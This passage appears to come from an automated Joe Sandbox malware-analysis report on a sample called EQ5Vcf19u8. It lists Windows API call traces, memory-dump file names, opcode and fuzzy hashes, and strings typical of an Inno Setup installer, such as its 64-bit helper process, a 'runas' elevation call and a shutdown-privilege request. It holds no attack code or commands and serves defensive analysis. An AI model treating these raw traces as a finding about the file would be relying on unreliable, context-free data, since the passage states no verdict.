                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                        • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                        APIs
                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                        • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                        • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3375834691-0
                                                                                        • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                        • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                        • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                        • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                        • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                        • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                        • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                        • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                        • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                        • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                        • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                        • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                        • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                        • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                        • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                        • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                        • API String ID: 2323315520-3614243559
                                                                                        • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                        • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                        • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                        • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0045862F
                                                                                        • QueryPerformanceCounter.KERNEL32(02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 00458638
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00458642
                                                                                        • GetCurrentProcessId.KERNEL32(?,02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 0045864B
                                                                                        • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                        • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 004586CF
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                        • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                        • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                        • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                        • API String ID: 770386003-3271284199
                                                                                        • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                        • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                        • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                        • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                        APIs
                                                                                          • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                          • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                          • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                          • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
                                                                                          • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                          • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02112BD8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                        • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                        • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                        • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                        • API String ID: 883996979-221126205
                                                                                        • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                        • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                        • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                        • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                        • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1631623395-0
                                                                                        • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                        • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                        • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                        • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00418393
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                        • GetWindowRect.USER32(?), ref: 004183CC
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                        • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                        • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                        • String ID: ,
                                                                                        • API String ID: 2266315723-3772416878
                                                                                        • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                        • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                        • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                        • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 107509674-3733053543
